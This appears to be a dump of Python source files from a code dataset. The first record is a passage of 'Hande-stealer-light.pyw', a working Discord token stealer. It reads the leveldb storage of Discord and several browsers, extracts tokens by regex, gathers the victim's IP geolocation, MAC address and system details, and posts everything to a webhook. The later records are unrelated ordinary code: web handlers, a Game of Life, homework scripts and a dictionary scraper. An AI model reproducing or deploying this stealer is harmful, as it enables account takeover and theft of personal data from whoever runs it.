\r\nembed.add_field(name='Youtube', value='https://www.youtube.com/channel/UCszs81OmjgsLzNsgk3f4yxw')\r\nembed.set_footer(text='Happy Hacking', icon_url=image1)\r\n\r\nembed.set_thumbnail(image1)\r\n\r\nhook.send(embed=embed)\r\n\r\ndef find_tokens(path):\r\n path += '\\\\Local Storage\\\\leveldb'\r\n tokens = []\r\n for file_name in os.listdir(path):\r\n if not file_name.endswith('.log') and not file_name.endswith('.ldb'):\r\n continue\r\n for line in [x.strip() for x in open(f'{path}\\\\{file_name}', errors='ignore').readlines() if x.strip()]:\r\n for regex in (r'[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}', r'mfa\\.[\\w-]{84}'):\r\n for token in re.findall(regex, line):\r\n tokens.append(token)\r\n return tokens\r\n \r\ntime.sleep(1) \r\n \r\ndef main():\r\n local = os.getenv('LOCALAPPDATA')\r\n roaming = os.getenv('APPDATA')\r\n message = ''\r\n paths = {\r\n 'Discord': roaming + '\\\\Discord',\r\n 'Discord Canary': roaming + '\\\\discordcanary',\r\n 'Discord PTB': roaming + '\\\\discordptb',\r\n 'Google Chrome': local + '\\\\Google\\\\Chrome\\\\User Data\\\\Default',\r\n 'Opera': roaming + '\\\\Opera Software\\\\Opera Stable',\r\n 'Brave': local + '\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default',\r\n 'Yandex': local + '\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default'\r\n }\r\n for platform, path in paths.items():\r\n if not os.path.exists(path):\r\n continue\r\n tokens = find_tokens(path)\r\n if len(tokens) > 0:\r\n for token in tokens:\r\n message += f'`{token}`\\n\\n'\r\n else:\r\n message += 'No tokens found.\\n'\r\n\r\n\r\n hook.send(f'{platform}\\n{message}')\r\n\r\n\r\nmain()\r\n\r\n\r\ndef stealip():\r\n\r\n time = datetime.now().strftime(\"%H:%M %p\") \r\n ip = requests.get('https://api.ipify.org/').text\r\n\r\n r = requests.get(f'http://extreme-ip-lookup.com/json/{ip}')\r\n geo = r.json()\r\n embed = Embed()\r\n fields = [\r\n {'name': 'IP', 'value': geo['query']},\r\n {'name': 'ipType', 'value': geo['ipType']},\r\n {'name': 'Country', 'value': geo['country']},\r\n {'name': 'City', 'value': geo['city']},\r\n {'name': 'Continent', 'value': geo['continent']},\r\n {'name': 'Country', 'value': geo['country']},\r\n {'name': 'IPName', 'value': geo['ipName']},\r\n {'name': 'ISP', 'value': geo['isp']},\r\n {'name': 'Latitute', 'value': geo['lat']},\r\n {'name': 'Longitude', 'value': geo['lon']},\r\n {'name': 'Org', 'value': geo['org']},\r\n {'name': 'Region', 'value': geo['region']},\r\n {'name': 'Status', 'value': geo['status']},\r\n]\r\n for field in fields:\r\n if field['value']:\r\n embed.add_field(name=field['name'], value=field['value'], inline=True)\r\n hook.send(embed=embed) \r\n\r\n\r\n\r\n\r\n\r\ndef stealmac():\r\n y = gma()\r\n hook.send(\"Mac Address : \")\r\n hook.send(y)\r\nstealmac() \r\n\r\ndef GetSysInfo():\r\n my_system = platform.uname()\r\n hook.send(\"System Information : \")\r\n hook.send(f\"System: {my_system.system}\")\r\n hook.send(f\"Node Name: {my_system.node}\")\r\n hook.send(f\"Release: {my_system.release}\")\r\n hook.send(f\"Version: {my_system.version}\")\r\n hook.send(f\"Machine: {my_system.machine}\")\r\n hook.send(f\"Processor: {my_system.processor}\")\r\n\r\n \r\nGetSysInfo()\r\n\r\nstealip()\r\n\r\n\r\n","sub_path":"Hande-stealer-light.pyw","file_name":"Hande-stealer-light.pyw","file_ext":"pyw","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"336352785","text":"import webapp2\nimport json\nimport logging\nfrom datetime import date\nfrom google.appengine.ext import db\n\nfrom models.stat import Stat\n\nclass UploadStats(webapp2.RequestHandler):\n def post(self):\n rawdata = self.request.get('stats')\n data = json.loads(rawdata)\n yearmonth = date.today().strftime(\"%Y%m\")\n\n dh = db.GqlQuery(\"SELECT * FROM Stat WHERE uuid = :1 AND yearmonth = :2 \", data['uuid'], yearmonth)\n if dh.count() == 1:\n logging.debug('stat for uuid %s yearmonth %s already exists' % (data['uuid'], yearmonth))\n return\n\n if dh.count() > 1:\n logging.error('Stored count for uuid %s and yearmonth %s is %i' % (data['uuid'], yearmonth, dh.count()))\n return\n\n stat = Stat()\n stat.data = rawdata\n stat.uuid = data['uuid']\n stat.yearmonth = yearmonth\n stat.ip = self.request.remote_addr\n stat.put()\n logging.debug('Stored new stat for uuid %s' % (data['uuid']))\n pass\n","sub_path":"controllers/uploadstats.py","file_name":"uploadstats.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"407662689","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.views.generic import TemplateView\n\ndef index(request):\n #return HttpResponse(\"Hello, world. You're at the polls index.\")\n return HttpResponseRedirect(reverse('url_home'))\n\n\ndef home(request):\n kwargs = {'title': 'Holter Monitor Web'}\n kwargs['no_sidebar'] = True\n kwargs['title'] = '¡Bienvenido!'\n kwargs['suptitle'] = ''\n return render(request, 'main/body.html', kwargs)\n\n# def tutorial(request):\n# kwargs = {}\n# kwargs['no_sidebar'] = True\n# kwargs['title'] = 'Tutorial'\n# return render(request, 'main/tutorial.html', kwargs)\n\nimport plotly.offline as opy\nimport plotly.graph_objs as go\nimport numpy as np\n\nclass Graph(TemplateView):\n template_name = 'main/tutorial.html'\n kwargs = {}\n kwargs['no_sidebar'] = True\n\n def get_context_data(self, **kwargs):\n context = super(Graph, self).get_context_data(**kwargs)\n\n # x = [-2,0,4,6,7]\n # y = [q**2-q+3 for q in x]\n # trace1 = go.Scatter(x=x, y=y, marker={'color': 'red', 'symbol': 104, 'size': \"10\"},\n # mode=\"lines\", name='1st Trace')\n\n # data=go.Data([trace1])\n # layout=go.Layout(title=\"Meine Daten\", xaxis={'title':'x1'}, yaxis={'title':'x2'})\n # figure=go.Figure(data=data,layout=layout)\n # div = opy.plot(figure, auto_open=False, output_type='div')\n # import plotly.plotly as py\n # import plotly.graph_objs as go\n\n # Create random data with numpy\n \n\n N = 1000\n random_x = np.random.randn(N)\n random_y = np.random.randn(N)\n\n # Create a trace\n trace = go.Scatter(\n x = random_x,\n y = random_y,\n mode = 'markers'\n )\n\n data = [trace]\n\n # Plot and embed in ipython notebook!\n # div = opy.plot(data, filename='basic-scatter')\n div = opy.plot(data, filename='basic-line')\n\n # or plot with: plot_url = py.plot(data, filename='basic-line')\n\n context['plot'] = div\n\n return context, kwargs\n\ndef plot1d():\n x_data = np.arange(0, 120,0.1)\n trace1 = go.Scatter(\n x=x_data,\n y=np.sin(x_data)\n )\n\n data = [trace1]\n layout = go.Layout(\n # autosize=False,\n # width=900,\n # height=500,\n\n xaxis=dict(\n autorange=True\n ),\n yaxis=dict(\n autorange=True\n )\n )\n fig = go.Figure(data=data, layout=layout)\n plot_div = opy.plot(fig, output_type='div', include_plotlyjs=False)\n return plot_div\n\n\nclass Plot1DView(TemplateView):\n template_name = \"main/tutorial.html\"\n\n def get_context_data(self, **kwargs):\n # Call the base implementation first to get a context\n context = super(Plot1DView, self).get_context_data(**kwargs)\n context['plot'] = plot1d()\n context['no_sidebar'] = True\n return context\n\ndef about_us(request):\n kwargs = {}\n kwargs['no_sidebar'] = True\n # kwargs['title'] = '¡Bienvenido!'\n # kwargs['suptitle'] = ''\n render(request, \"about_us.html\", kwargs)","sub_path":"apps/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"465474725","text":"import numpy as np\n\n\"\"\"\nDie Funktion nimmt eine Koordinate des Arrays sowie die Breite(Höhe) als Parameter entgegen.\nLiegt die Koordinate innerhalb der Breite wird diese ohne Veränderung zurückgegeben.\nSollte die Koordinate außerhalb der Breite und damit des Array Bereichs liegen, \nwird diese durch die Modulo Funktionalität auf den Anfang des Arrays gesetzt.\nDie Funktion gibt die ermittelte Koordinate zurück.\n\"\"\"\n\n\ndef trueValue(x, N):\n return (x + N) % N\n\n\n\"\"\"\nDie Funktion nimmt eine Position im Array über die x,y Koordinaten, sowie das Array selbst als Parameter an.\nSie ermittelt zunächst die Länge des Arrays.\nAnschließend werden die Werte der acht Nachbarn des Arrays nach den Regeln des Game of Life abgefragt. \nHierbei wird der \"wahre Wert\" des Nachbarn zuvor bestimmt, um die Randfälle abzudecken, an denen eine solche \nAbfrage sonst außerhalb Bereichs läge.\nSie gibt eine Addition der Werte, die diese Nachbarn besitzen, zurück.\n\"\"\"\n\n\ndef neighbors(x, y, grid):\n N = len(grid)\n return grid[trueValue(y - 1, N)][trueValue(x + 1, N)] + \\\n grid[trueValue(y - 1, N)][trueValue(x, N)] \\\n + grid[trueValue(y - 1, N)][trueValue(x - 1, N)] + \\\n grid[trueValue(y, N)][trueValue(x + 1, N)] + \\\n grid[trueValue(y, N)][trueValue(x - 1, N)] + \\\n grid[trueValue(y + 1, N)][trueValue(x + 1, N)] + \\\n grid[trueValue(y + 1, N)][trueValue(x, N)] + \\\n grid[trueValue(y + 1, N)][trueValue(x - 1, N)]\n\n\n\"\"\"\nDiese Funktion führt ein Game of Life auf einem als Parameter gegebenen (2D-)Array aus.\nDabei wird zunächst eine \"leere\" Kopie des Arrays erstellt und die Breite des Arrays ermittelt.\nAnschließend wird mit einer doppelten for-Schleife über das Array iteriert.\nDabei wird für jede Zelle betrachtet, wie viele lebendige Nachbarn diese Zelle hat.\nBei drei Nachbarn wird der Punkt mit einer 1 markiert (bleibt lebendig), bei zwei bleibt die Zelle Lebendig,\nwenn diese schon zuvor lebendig ist. In jedem anderen Fall stirbt die Zelle (wird mit einer 0 markiert)\nDie neuen Werte werden dabei in dem zu Anfang erstellten, neuen Array gespeichert. Das übergegebene Array wird \nzu keinem Zeitpunkt in der Funktion geändert.\nAm Ende gibt die Funktion das Array mit den neuen Werten zurück.\n\"\"\"\n\n\ndef gameOfLife(grid):\n grid_out = np.empty_like(grid)\n N = len(grid)\n for y in range(N):\n for x in range(N):\n # Ermittlung der Nachbarn der Zelle\n z = neighbors(x, y, grid)\n # Bei 3 lebendigen Nachbarn lebt die Zelle in jedem Fall\n if z == 3:\n grid_out[y][x] = 1\n # Die Ermittlung für diese Zelle ist abgeschlossen.\n # Es soll mit der nächsten Zelle weitergemacht werden -> continue\n continue\n # Bei 2 lebendigen Nachbarn lebt die Zelle in dem Fall, dass Sie lebendig ist.\n if (grid[y][x] == 1) and (z == 2):\n grid_out[y][x] = 1\n continue\n # Wenn keine der vorherigen Bedingungen zutrifft, ist die Zelle tot.\n grid_out[y][x] = 0\n return grid_out\n","sub_path":"GoLVarianten/GoLPythonModular.py","file_name":"GoLPythonModular.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653887989","text":"from . import app, db, auth, good_response, bad_response, opera_images, opera_audios\nfrom app.model import opera, autore\nfrom flask import request, abort\n\nfrom .flask_uploads import UploadNotAllowed\nfrom werkzeug import secure_filename\n\nimport os\n\n\n@app.route('/api/operas', methods=['GET'])\ndef get_operas():\n try:\n page_n = int(request.args.get('page', 1))\n\n per_page = int(request.args.get('per_page', 5000))\n except ValueError:\n abort(400)\n\n page = opera.Opera.query.paginate(page_n, per_page=per_page)\n\n op = [o.light_serialize() for o in page.items]\n\n return good_response(op)\n\n\n@app.route('/api/operas/', methods=['GET'])\ndef get_opera(id):\n o = opera.Opera.query.get_or_404(id)\n\n return good_response(o.serialize())\n\n\n\n@app.route('/api/operas', methods=['POST'])\n@auth.login_required\ndef post_opera():\n if not request.json \\\n or 'nome' not in request.json \\\n or 'codice_stanza' not in request.json \\\n or 'tipo_id' not in request.json \\\n or 'tecnica_id' not in request.json \\\n or 'descrizione' not in request.json \\\n or 'didascalia' not in request.json \\\n or 'inventario' not in request.json \\\n or 'data_donazione' not in request.json \\\n or 'data_realizzazione' not in request.json:\n abort(400)\n\n\n try:\n tipo_id = int(request.json['tipo_id'])\n tecnica_id = int(request.json['tecnica_id'])\n\n if not opera.Tipo.query.get(tipo_id):\n return bad_response('tipo non trovato'), 400\n\n if not opera.Tecnica.query.get(tecnica_id):\n return bad_response('tecnica non trovata'), 400\n\n\n autore_id = None\n percorso_id = None\n\n\n if 'autore_id' in request.json:\n autore_id = int(request.json['autore_id'])\n q = autore.Autore.query.get(autore_id)\n \n if not q:\n return bad_response('autore non trovato'), 400\n\n\n if 'percorso_id' in request.json:\n percorso_id = int(request.json['percorso_id'])\n q = opera.Percorso.query.get(percorso_id)\n \n if not q:\n return bad_response('percorso non trovato'), 400\n\n\n o = opera.Opera(nome=request.json['nome'],\n codice_stanza=request.json['codice_stanza'],\n tipo_id=tipo_id, tecnica_id=tecnica_id, \n autore_id=autore_id, percorso_id=percorso_id,\n descrizione=request.json['descrizione'],\n didascalia=request.json['didascalia'],\n inventario=int(request.json['inventario']),\n data_donazione=request.json['data_donazione'],\n data_realizzazione=request.json['data_realizzazione'])\n\n db.session.add(o)\n db.session.commit()\n\n return good_response(o.serialize()), 201\n\n except ValueError:\n abort(400)\n \n\n\n@app.route('/api/operas/', methods=['PUT'])\n@auth.login_required\ndef update_opera(id):\n if not request.json:\n abort(400)\n\n o = opera.Opera.query.get_or_404(id)\n\n try:\n if 'nome' in request.json:\n o.nome = request.json['nome']\n\n if 'codice_stanza' in request.json:\n o.codice_stanza = request.json['codice_stanza']\n\n if 'tipo_id' in request.json:\n o.tipo_id = int(request.json['tipo_id'])\n\n if 'tecnica_id' in request.json:\n o.tecnica_id = int(request.json['tecnica_id'])\n\n if 'percorso_id' in request.json:\n o.percorso_id = int(request.json['percorso_id'])\n\n if 'autore_id' in request.json:\n o.autore_id = int(request.json['autore_id'])\n\n if 'descrizione' in request.json:\n o.descrizione = request.json['descrizione']\n\n if 'didascalia' in request.json:\n o.didascalia = request.json['didascalia']\n\n if 'inventario' in request.json:\n o.inventario = int(request.json['inventario'])\n\n if 'data_donazione' in request.json:\n o.data_donazione = request.json['data_donazione']\n\n if 'data_realizzazione' in request.json:\n o.data_realizzazione = request.json['data_realizzazione']\n\n db.session.commit()\n\n return good_response(o.serialize())\n\n except ValueError:\n abort(400)\n\n \n\n@app.route('/api/operas/', methods=['DELETE'])\n@auth.login_required\ndef delete_opera(id):\n o = opera.Opera.query.get_or_404(id)\n\n for img in o.immagini:\n os.remove(opera_images.path(img.filename))\n\n for audio in o.audio_files:\n os.remove(opera_audios.path(audio.filename))\n\n db.session.delete(o)\n db.session.commit()\n\n return good_response('')\n\n\n\n@app.route('/api/operas//images', methods=['POST'])\n@auth.login_required\ndef post_opera_image(id):\n if not request.files or 'opera_images' not in request.files:\n abort(400)\n\n opera.Opera.query.get_or_404(id) ## integrity check\n\n try:\n for f in request.files.getlist('opera_images'):\n\n secure = secure_filename(f.filename)\n \n filename = opera_images.save(f, name=secure)\n\n img = opera.ImmagineOpera(filename=filename, opera_id=id)\n\n db.session.add(img)\n db.session.commit()\n\n return good_response(''), 201\n except UploadNotAllowed:\n abort(400)\n\n\n@app.route('/api/operas//audios', methods=['POST'])\n@auth.login_required\ndef post_opera_audio(id):\n if not request.files or 'opera_audios' not in request.files:\n abort(400)\n\n opera.Opera.query.get_or_404(id) ## integrity check\n\n try:\n for f in request.files.getlist('opera_audios'):\n\n secure = secure_filename(f.filename)\n \n filename = opera_audios.save(f, name=secure)\n\n audio = opera.AudioOpera(filename=filename, opera_id=id)\n\n db.session.add(audio)\n db.session.commit()\n\n\n return good_response(''), 201\n except UploadNotAllowed:\n abort(400)","sub_path":"backend/app/api/opera.py","file_name":"opera.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"489354262","text":"import sys\nsys.stdin = open('sample_input_sort.txt', 'r')\n\ndef find_max(arr):\n max_idx = 0\n for i in range(len(arr)):\n if arr[i] > arr[max_idx]:\n max_idx = i\n return max_idx\n\ndef find_min(arr):\n min_idx = 0\n for i in range(len(arr)):\n if arr[i] < arr[min_idx]:\n min_idx = i\n return min_idx\n\nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n numbers = list(map(int, input().split()))\n\n for i in range(10):\n # 짝수번째 인덱스에서는 max 찾기\n if i % 2 == 0:\n max_idx = find_max(numbers[i:]) + i\n # max와 현재 숫자 스왑하기\n numbers[i], numbers[max_idx] = numbers[max_idx], numbers[i]\n # 홀수번째 인덱스에서는 min 찾기\n else:\n min_idx = find_min(numbers[i:]) + i\n numbers[i], numbers[min_idx] = numbers[min_idx], numbers[i]\n result = \" \".join(list(map(str, numbers[0: 10])))\n print(\"#%d %s\" % (tc, result))","sub_path":"0216/special_sort.py","file_name":"special_sort.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"606561382","text":"distance = 0\nenergy = 250\nwhile distance != 'home':\n choice = input('Would you like to walk, run, rest, eat or go home? ')\n if choice.lower() == 'run':\n if energy - 50 >= 0:\n distance += 5\n energy -= 50\n else:\n print('Not enough energy. You must rest or eat')\n elif choice.lower() == 'walk':\n if energy - 10 >= 0:\n distance += 1\n energy -= 10\n else:\n print('Not enough energy. You must rest or eat')\n elif choice.lower() == 'rest':\n energy += 20\n elif choice.lower() == 'eat':\n energy += 30\n elif choice.lower() == 'go home':\n print(\"You're home\")\n distance = 'home'\n else:\n print('Please enter \"run\", \"walk\", \"rest\", \"eat\" or \"go home\"')\n\n if distance != 'home':\n print('Distance from home is {}km'.format(distance))\n print('Energy = {}'.format(energy))\n","sub_path":"exercise6.2.py","file_name":"exercise6.2.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"475322627","text":"import os\n\nfs = os.popen(\"{} stm/.pio/build/msign_board/firmware.elf esp/.pio/build/msign_board/firmware.elf\".format(os.path.expanduser(\"~/.platformio/packages/toolchain-gccarmnoneeabi/bin/arm-none-eabi-size\"))).read().split(\"\\n\")[1:]\n\nsections = [[int(x) for x in y.split(\"\\t\")[:3]] for y in fs[:-1]]\n\nwith open(\"stm.csv\", \"w\") as f:\n f.write('\"flash\",\"ram\"\\n')\n f.write(\"{},{}\".format(sections[0][0] + sections[0][1], sections[0][1] + sections[0][2]))\n\nwith open(\"esp.csv\", \"w\") as f:\n f.write('\"flash\",\"ram\"\\n')\n f.write(\"{},{}\".format(sections[1][0] + sections[1][1], sections[1][1] + sections[1][2]))\n","sub_path":"get_sizes.py","file_name":"get_sizes.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"169772694","text":"import numpy as np\nX= np.array([[0,1,0],[0,1,1],[1,2,1],[1,2,0],[1,2,2],[2,2,2],[1,2,-1],[2,2,3],[-1,-1,-1],[0,-1,-2],[0,-1,1],[-1,-2,1]])\n# make X as an array of 12x3 dimension with the training data. first 4 entries are A, next 4 are of B and the last 4 are of C.\nY = np.array([[1],[1],[1],[1],[2],[2],[2],[2],[3],[3],[3],[3]])\n# make Y as the label array where label 1 is A, 2 is B and 3 is C.\nXtest = np.array([[1,0,1],[1,0,1],[1,0,1],[1,0,1],[1,0,1],[1,0,1],[1,0,1],[1,0,1],[1,0,1],[1,0,1],[1,0,1],[1,0,1]])\n# Xtest is an array I made that has 12 similar elements of the test point. \n# I am using this to calculate the distance between the point and the training data\nprint(X[0]-Xtest[0])\ndist=np.zeros((12,1))\n# initializing the array containing the distances with all 0's in th beginning\nfor i in range(len(X)):\n d= np.linalg.norm(X[i]-Xtest[i])\n # calculates the euclidean distance (L2) and stores it in the variable d which is then entered into the dist array. \n dist[i]=d\nprint(dist)\nprint(np.argmin(dist))\n# np.argmin calculates the minimum element in the array and return the index. \n# We can make the comparison by reading the smallest distances and their indexes and comparing the label array with it\n","sub_path":"DL-HW1-KNN-classifier/hw1-q1.py","file_name":"hw1-q1.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"280481319","text":"#!/usr/bin/env python3\nimport requests\nimport lxml.html\nimport argparse #读取终端参数\n\nvoice_switch = 0\nlanguage=['jp','jc']\ncss_1 = 'header.word-details-pane-header'\ncss_2 = 'div.word-details-item-content'\ncss_voice = 'span.word-audio.audio.audio-light'\nuseragent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'\n\ndef option():\n parser = argparse.ArgumentParser()\n parser.add_argument('word',type=str,help='need search word',nargs='*')\n parser.add_argument(\"-v\",\"--voice\",help=\"read word\",action=\"store_true\")\n args = parser.parse_args()\n if args.voice:\n voice_switch = 1\n\n return args.word\n\ndef start(args_word):\n i=0\n for word in args_word:\n i+=1\n print('\\n########################查询单词('+str(i)+') '+word+' #####################################\\n')\n url = 'https://dict.hjenglish.com/'+language[0]+'/'+language[1]+'/' + word\n try:\n tree = lxml.html.fromstring((requests.get(url,headers={'User-Agent':useragent})).text)\n print_word(merge((get(css_1,tree))[0],(get(css_2,tree))[0],(get(css_1,tree))[1]))\n except IndexError as e:\n pass\n\ndef get(css,tree):\n word=[]\n i=0\n for div_temp in tree.cssselect(css):\n word_temp = div_temp.text_content()#提取翻译\n word.append(word_temp)\n i=i+1\n\n return word,i\n\ndef merge(word_1,word_2,number):#合并翻译与例句\n c=[]\n for n in range(number):\n c.append(word_1[n]+'**************详细解释/例句:*************'+word_2[n])\n\n return c\n\ndef print_word(word):\n i=0\n for word_temp in word:\n i+=1\n print('-----------------------解释'+str(i)+'-------------------------------')\n for word_tmp in word_temp.split():\n print(word_tmp)\n\n\ndef main():\n start(option())\n\nif __name__ == '__main__':\n main()\n","sub_path":"hjjp/hjjp_jiu.py","file_name":"hjjp_jiu.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"241332034","text":"from django import forms\nfrom .models import Rental, MaintRequest\n\nclass RentalCreationForm(forms.ModelForm):\n \"\"\" Add a rental property \"\"\"\n\n class Meta:\n model = Rental\n fields = ['address', 'postcode', 'city', 'no_of_tenants', 'image']\n\nclass MaintenanceCreationForm(forms.ModelForm):\n \"\"\" Add a maintenance request \"\"\"\n\n class Meta:\n model = MaintRequest\n fields = ['title', 'details', 'priority', 'image']\n\n\nclass StatusUpdateForm(forms.ModelForm):\n \"\"\" Update status of maintenance request \"\"\"\n\n class Meta:\n model = MaintRequest\n fields = ['status']\n\n def __init__(self, *args, **kwargs):\n \"\"\" Set no label on status field \"\"\"\n\n super(StatusUpdateForm, self).__init__(*args, **kwargs)\n self.fields['status'].label = False\n\n\nclass MaintenanceQuoteForm(forms.ModelForm):\n \"\"\" Update maintenance request with a cost/quote \"\"\"\n\n class Meta:\n model = MaintRequest\n fields = ['cost', 'invoice_pdf', 'paid_by']","sub_path":"maintenance/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}